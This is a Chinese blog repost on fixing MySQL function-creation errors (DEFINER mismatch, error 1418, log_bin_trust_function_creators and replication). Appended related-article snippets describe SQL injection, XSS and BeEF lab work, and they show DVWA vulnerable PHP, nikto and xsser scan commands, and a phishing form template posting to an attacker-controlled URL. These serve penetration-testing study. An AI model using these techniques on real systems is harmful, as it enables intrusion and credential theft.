MYSQL 创建函数出错的解决方案

最新推荐文章于 2025-03-31 15:26:46 发布
最新推荐文章于 2025-03-31 15:26:46 发布
阅读量185 收藏
点赞数
文章标签: 数据库
原文链接:https://yq.aliyun.com/articles/174116
版权

本文转自IT摆渡网欢迎转载,请标明出处
摆渡网

更多mysq文章请阅读

mysql问题错误修改

  在使用MySQL数据库时,有时会遇到MySQL函数不能创建的情况。下面就教您一个解决MySQL函数不能创建问题的方法,供您借鉴参考。

  案例一:

  目前在项目中,执行创建mysql的函数出错,

  mysql 创建函数出错信息如下:

  Error Code: 1227. Access denied; you need (at least one of) the SUPER privilege(s) for this operation

  首先检查创建函数的功能是否开启,检查是否开启创建功能的SQL如下:

  -- 查看是否开启创建函数的功能

  show variables like '%func%';

  -- 开启创建函数的功能

  set global log_bin_trust_function_creators = 1;

  执行完SQL之后发现已经开启了,随检查自己的SQL是否写错(因为SQL是别人给的,在别人环境没问题,在自己的环境就有可能)。

  突然发现了确实是SQL出现问题,由于他创建的SQL有指定用户,所以导致出现问题,以下是他的SQL:

  DROP FUNCTION IF EXISTS nextval;

  DELIMITER ;;

  CREATE DEFINER=devop@% FUNCTION nextval(seq_name VARCHAR(50)) RETURNS varchar(20) CHARSET utf8

  BEGIN

  DECLARE seq_max BIGINT(20);

  UPDATE sequenceconftable SET max = max + NEXT WHERE NAME = seq_name;

  SELECT max INTO seq_max FROM sequenceconftable WHERE NAME = seq_name ;

  RETURN seq_max;

  END

  ;;

  DELIMITER ;

  由于CREATE_FUNCTION规范,可以发现就是DEFINER这个参数是可以指定数据库用户的,但是自己的库却不是这个用户,所以导致问题。

  目前问题已经解决。

  -EOF-

  案例二:

  在MySQL创建用户自定义函数时,报以下错误:

  ERROR 1418 (HY000): This function has none of DETERMINISTIC, NO SQL, or READS SQL DATA in its declaration and binary logging is enabled (you might want to use the less safe log_bin_trust_function_creators variable)

  这是因为有一个安全参数没有开启,log_bin_trust_function_creators 默认为0,是不允许function的同步的,开启这个参数,就可以创建成功了。

  mysql> show variables like '%fun%';

  +---------------------------------+-------+

  | Variable_name | Value |

  +---------------------------------+-------+

  | log_bin_trust_function_creators | ON |

  +---------------------------------+-------+

  1 row in set (0.00 sec)

  mysql> set global log_bin_trust_function_creators=1;

  Query OK, 0 rows affected (0.00 sec)

  mysql> show variables like '%fun%';

  +---------------------------------+-------+

  | Variable_name | Value |

  +---------------------------------+-------+

  | log_bin_trust_function_creators | ON |

  +---------------------------------+-------+

  1 row in set (0.00 sec)

  如果是在有master上开启了该参数,记得在slave端也要开启这个参数(salve需要stop后再重新start),否则在master上创建函数会导致replaction中断。

  案例三:

  Error Code : 1418

  This function has none of DETERMINISTIC, NO SQL, or READS SQL DATA in its declaration and binary logging is enabled (you might want to use the less safe log_bin_trust_function_creators variable)

  (0 ms taken)

  分析:

  根据系统提示,导致该错误的原因可能是一个安全设置方面的配置,查手册log_bin_trust_function_creators参数缺省0,是不允许function的同步的,一般我们在配置repliaction的时候,都忘记关注这个参数,这样在master更新funtion后,slave就会报告错误,然后slave stoped。

  处理过程:

  登陆mysql数据库

  > set global log_bin_trust_function_creators = 1;

  > start slave;

  跟踪mysql的启动日志,slave正常运行,问题解决。

网络安全工程师面试合集】—SQL注入分类 以及 常用注入
请大家直接把问题写在评论区或留言,不要只说一句"你好 或 在吗",我会尽快回复的。
11-29 4829
目录 4.1.1. 注入分类 4.1.1.1. 简介 4.1.1.2. 按技巧分类 4.1.1.3. 按获取数据的方式分类 4.1.1.3.1. inband 4.1.1.3.2. inference 4.1.1.3.3. out of band (OOB) 4.1.2. 注入检测 4.1.2.1. 常见的注入点 4.1.2.2. Fuzz注入点 4.1.2.3. 测试用常量 4.1.2.4. 测试列数 4.1.2.5. 报错注入 4.1.2.5.1. 基于geometric的报
SQL注入攻击常见方式及测试方法
热门推荐
Lambda_Y的博客
11-04 11万+
本文主要针对SQL注入的含义、以及如何进行SQL注入如何预防SQL注入让小伙伴有个了解。适用的人群主要是测试人员,了解如何进行SQL注入,可以帮助我们测试登录、发布等模块的SQL攻击漏洞,至于如何预防SQL注入,按理说应该是开发该了解的事情~但是作为一个棒棒的测试,搞清楚原理是不是能让我们更加透彻地理解bug的产生原因呢~好啦,话不多说,进入正题~ 如何理解SQL注入攻击)? SQL注入
kali渗透技术实战——搭建渗透测试环境
weixin_54787877的博客
02-21 3982
如果想要了解系统的安全状况,那么可以进行渗透测试,找出系统中的漏洞,验证是否存在安全隐患。 渗透测试的含义不只是评估,它会用已发现的漏洞来进行测试,以验证该漏洞是真实存在还是只是虚惊一场(假阳性)。举个例子,审计或评估利用的是扫描工具,这些工具会显示多个系统上的数百个可能的漏洞。而渗透测试则会采用恶意黑客的惯用手段来尝试对这些漏洞进行攻击。这样可以验证哪些漏洞真实存在,从而可以将实际的系统漏洞数降至少量。最有效的渗透测试是那些针对特定系统的有特定目标的测试。质胜于量,这才是检验成功渗透测试的标准。在目标性攻
网络渗透测试实验
qq_27846373的博客
12-09 3332
一、跨站攻击 内容:利用Beef劫持被攻击者客户端浏览器。 实验环境搭建。 角色:留言簿网站。存在XSS漏洞;(IIS或Apache、guestbook搭建) 攻击者:Kali(使用beEF生成恶意代码,并通过留言方式提交到留言簿网站); 被攻击者:访问留言簿网站,浏览器被劫持。 前期准备,用Windows server 2003搭建网站,这个就不展开讲了,不是实验重点。 1.利用AWVS扫描留言簿网站,发现存在xss漏洞 2.kali使用beef生成恶意代码 ...
XSS 漏洞从 0 到 1:超详细攻击与防御全解析(小白也能看懂)
Aishenyanying33的博客
03-31 1511
🚀 什么是 XSS(跨站脚本攻击)? XSS(Cross-Site Scripting,跨站脚本攻击)是一种 前端漏洞,攻击者可以在网站中 插入恶意 JavaScript 代码,让受害者的浏览器执行这些代码。 🔥 XSS 能干什么? 窃取用户 Cookie,劫持会话(Session) ➜ 劫持账号,盗取敏感信息 伪造页面(钓鱼攻击) ➜ 诱导用户输入账号密码 利用浏览器漏洞执行恶意代码 ➜ 远程控制用户设备 记录用户键盘输入 ➜ 获取账号密码、信用卡信息 嵌入恶意框架(IFRAME 挂马)
2020-11-22
qq_51370368的博客
11-24 464
实验 XSSSQL注入 实验目的:了解什么是XSS;了解XSS攻击实施,理解防御XSS攻击的方法;了解SQL注入的基本原理;掌握PHP脚本访问MySQL数据库的基本方法;掌握程序设计中避免出现SQL注入漏洞的基本方法;掌握网站配置。 系统环境:Kali Linux 2、Windows Server 网络环境:交换网络结构 实验工具: Beef;AWVS(Acunetix Web Vulnarability Scanner);SqlMAP;DVWA 实验步骤: XSS部分:利用Beef劫持被攻击者客户
网络渗透试验(
qq_48489570的博客
12-01 618
实验目的 了解什么是XSS;了解XSS攻击实施,理解防御XSS攻击的方法;了解SQL注入的基本原理;掌握PHP脚本访问MySQL数据库的基本方法;掌握程序设计中避免出现SQL注入漏洞的基本方法;掌握网站配置。 系统环境 Kali Linux 2、Windows Server 网络环境 交换网络结构 实验工具 Beef;AWVS(Acunetix Web Vulnarability Scanner);SqlMAP;DVWA 实验步骤 XSS部分:利用Beef劫持被攻击者客户端浏览器。 角色:留言簿网站。存在
oracle sql查询时间_「Burpsuite练兵场」SQL注入及相关实验(二)
weixin_39715652的博客
12-04 210
Burpsuite练兵场系列文章更新啦,今天的内容是延续上期关于SQL注入及相关实验的讲解,对实验感兴趣的小伙伴千万别错过了呦!上期回顾「Burpsuite练兵场」SQL注入及相关实验(一)上节内容介绍了一些基础的SQL注入操作,这一节实验学习的内容为如何在探查到了SQL注入点后利用漏洞获取到数据库信息。通过SQL注入获取数据库信息获取数据库的关键信息,如数据库中的表列需要访问保存描述各种数据库...
SQL注入攻击的原理及其防范措施
雪候鸟
08-31 1671
SQL注入攻击的原理及其防范措施ASP编程门槛很低,新手很容易上路。在一段不长的时间里,新手往往就已经能够编出看来比较完美的动态网站,在功能上,老手能做到的,新手也能够做到。那么新手与老手就没区别了吗?这里面区别可就大了,只不过外行人很难一眼就看出来罢了。在界面的友好性、运行性能以及网站的安全性方面是新手与老手之间区别的个集中点。而在安全性方面,新手最容易忽略的问题就是SQL注入漏洞的问题。用N
网络渗透测试实验
wow_iamfree的博客
12-07 689
文章目录一、实验目的二、实验准备与内容实验过程1.netdiscover发现WebDeveloper的ip2.nmap扫描目标开发端口3.访问目标网站4.whatweb探测CMS模板5.WPScan工具简介6.Dirb网站目录爆破7.通过爆出的路径找到cap文件8.利用WordPress插件漏洞找到目标配置文件9.远程连接目标10.使用tcpdump执行任意命令 一、实验目的 通过对目标靶机的渗透过程,了解CTF竞赛模式,理解CTF涵盖的知识范围,如MISC、PPC、WEB等,通过实践,加强团队协作能
渗透测试实验——XSSSQL注入
JNpvA的博客
12-14 588
实验目的:了解什么是XSS;了解XSS攻击实施,理解防御XSS攻击的方法;了解SQL注入的基本原理;掌握PHP脚本访问MySQL数据库的基本方法;掌握程序设计中避免出现SQL注入漏洞的基本方法;掌握网站配置。 系统环境:Kali Linux 2、Windows Server 网络环境:交换网络结构 实验工具: Beef;AWVS(Acunetix Web Vulnarability Scanner);SqlMAP;DVWA 实验步骤: XSS部分:利用Beef劫持被攻击者客户端浏览器。 实验环境搭建。 角色
网络渗透测试实验SQL注入
2301_79456294的博客
12-31 919
在本次实验中,我们研究了两种常见的Web安全漏洞——SQL注入。首先确认了存在SQL注入漏洞的位置,然后逐步探索了数据库的信息,包括数据库名、用户名、密码以及表结构等。这个过程不仅让我们理解了SQL注入的基本原理,还掌握了sqlmap这一强大工具的具体用法。打开Metasploitable2后,里面有搭建好的DVWA,访问http://自己tasploitable的IP/dvwa (先扫描一下内网的ip,确定Metasploitable2的ip地址)掌握程序设计中避免出现SQL注入漏洞的基本方法;
Kali Linux渗透测试之扫描工具——Nikto
橘子女侠
06-14 8801
扫描工具—Nikto 1. Nikto Nikto 是由Perl语言开发的开源代码、功能强大的WEB扫描评估软件,能对web服务器多种安全项目进行测试的扫描软件。 它支持两种扫描模式,代理截断模式主动扫描模式。 2. 手动扫描与自动扫描 手动扫描:用户手动去点击页面,发现页面存在的问题,但可能会存在遗漏。 自动扫描:基于字典的扫描,可以提高扫描的速度,但存在误报触发警告,容易...
Kali渗透测试之DVWA系列6——CSRF(跨站请求伪造)
浅浅的博客
05-11 4000
目录 一、CSRF简介 二、原理示意图 实验环境 四、实验步骤 安全级别:Low(四种方法) 安全级别:Medium 安全级别:High 安全级别:Impossible 一、CSRF简介 CSRF(Cross-site request forgery)跨站请求伪造,也被称为...
网络安全 kali虚拟机中的渗透实验
weixin_46067990的博客
04-11 6190
使用工具:kali虚拟机 一台靶机(准备的WindowsXP靶机) 渗透实验过程 用kali攻击Windows的XP系统 1、 先扫描找漏洞(已经准备好了一个微软平台的08年的漏洞MS08.67) 2、 渗透成功之后,建立一个反弹的连接 3、 运用权限,远程建立一个用户 4、 留后门的工作暂时先不进行 5、 成功之后返回 ...
Kali Linux 内网渗透教程 - ARP欺骗攻击 | 超详细
serendipity_cat的博客
01-29 1万+
Kali Linux初阶内网渗透教程ARP欺骗开始实验一、将Kali Linux桥接至局域网二、扫描局域网内主机、进行ARP欺骗四、如何防御ARP攻击 更新时间:2021年1月29日 本教程仅作学习,禁止使用教程内的任何指令对非个人电脑实施渗透,否则后果自负 安装Kail Linux&配置软件源 ARP欺骗 ARP(地址解析协议AddressResolution Protocol) 根据IP地址获取MAC地址的TCP/IP协议 局域网内A主机向B主机发送报文时会查询本地的ARP缓存表,当找
Kali Linux-网络安全之-XSS 跨站脚本攻击原理及 DVWA 靶机的搭建
xueshenlaila的博客
12-31 1481
XSS 跨站脚本攻击 使用 JavaScript 创建 Cookie JavaScript 可以使用 document.cookie 属性来创建 、读叏、及删除 cookie。 例 1:JavaScript 中,创建 cookie 如下所示: document.cookie=“username=John Doe”; 例 2:你还可以为 cookie 添加一个过期时间(以 UTC 戒 GMT 时间)。默认情况下,cookie 在 浏览器关闭时删除: document.cookie=“username=John
kali linux扫描sql注入,Kali Linux系统利用DVWA靶场进测试SQL注入漏洞:
weixin_34509784的博客
05-15 433
手工盲注:手工盲注分为基于布尔的盲注、基于时间的盲注以及基于报错的盲注,手工盲注步骤:1.判断是否存在注入注入是字符型还是数字型;2.猜解当前数据库名;3.猜解数据库中表名;4.猜解表中的字段名;5.猜解数据.Low安全级别源代码:if( isset( $_GET[ 'Submit' ] ) ) {// Get input$id = $_GET[ 'id' ];// Check database...
kali二次注入
最新发布
04-01
### Kali Linux中与二次注入相关的技术操作 #### 什么是二次注入? 二次注入是一种高级攻击形式,通常发生在应用程序未能正确处理用户输入的情况下。在这种情况下,恶意数据会被存储在数据库或其他持久化介质中,并在稍后的某个时间点被重新解析或执行[^1]。 #### 实现二次注入的技术细节 为了利用二次注入漏洞,渗透测试人员需要遵循以下原则技术: 1. **识别潜在的二次注入场景** - 应用程序可能将用户的输入存储到数据库中,并在未来将其作为动态内容呈现给其他用户。 - 数据库中的字段可能会被再次解析为SQL语句的一部分,或者通过模板引擎渲染成HTML页面[^3]。 2. **构造有效的载荷** - 使用工具如 `sqlmap` 或手动编写 SQL 注入载荷来验证是否存在未经过滤的数据存储行为。 - 对于 XSS 类型的二次注入,可以尝试嵌套 JavaScript 脚本标签 `<script>` 并观察其是否被执行。 3. **自动化工具的应用** - 利用 Kali Linux 提供的安全评估工具集,例如 Nikto Xsser 来辅助发现确认这些复杂的注入路径。 ```bash nikto -host http://example.com -output /path/to/output.txt ``` 上述命令用于扫描目标网站并记录结果至指定文件中以便后续分析[^2]。 同样地,在寻找跨站脚本(XSS)可能性方面,可以通过如下方式调用 Xsser 工具: ```bash xsser -u "http://targetsite/page" -g "param=value" --cookie="sessionid=abcde" ``` 4. **实际案例演示——基于 SET 的社会工程学攻击扩展** 当使用 Social Engineering Toolkit (SET) 构建钓鱼网页时,默认生成的 HTML 表单允许自定义提交地址以及参数名称。如果开发者忽略了对 POST 请求数据的有效校验,则可能导致进一步的危害扩散[^4]。 ```html <form action="{{ attacker_controlled_url }}" method="post"> <!-- 用户填写的信息 --> </form> ``` 上述代码片段展示了如何修改默认配置从而引导受害者访问受控资源,进而触发额外逻辑链路下的安全风险暴露。 --- #### 注意事项 尽管掌握此类技能对于合法授权范围内的红队行动至关重要,但在未经授权前提下实施任何类型的入侵活动均属违法行为,请务必严格遵守法律法规!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值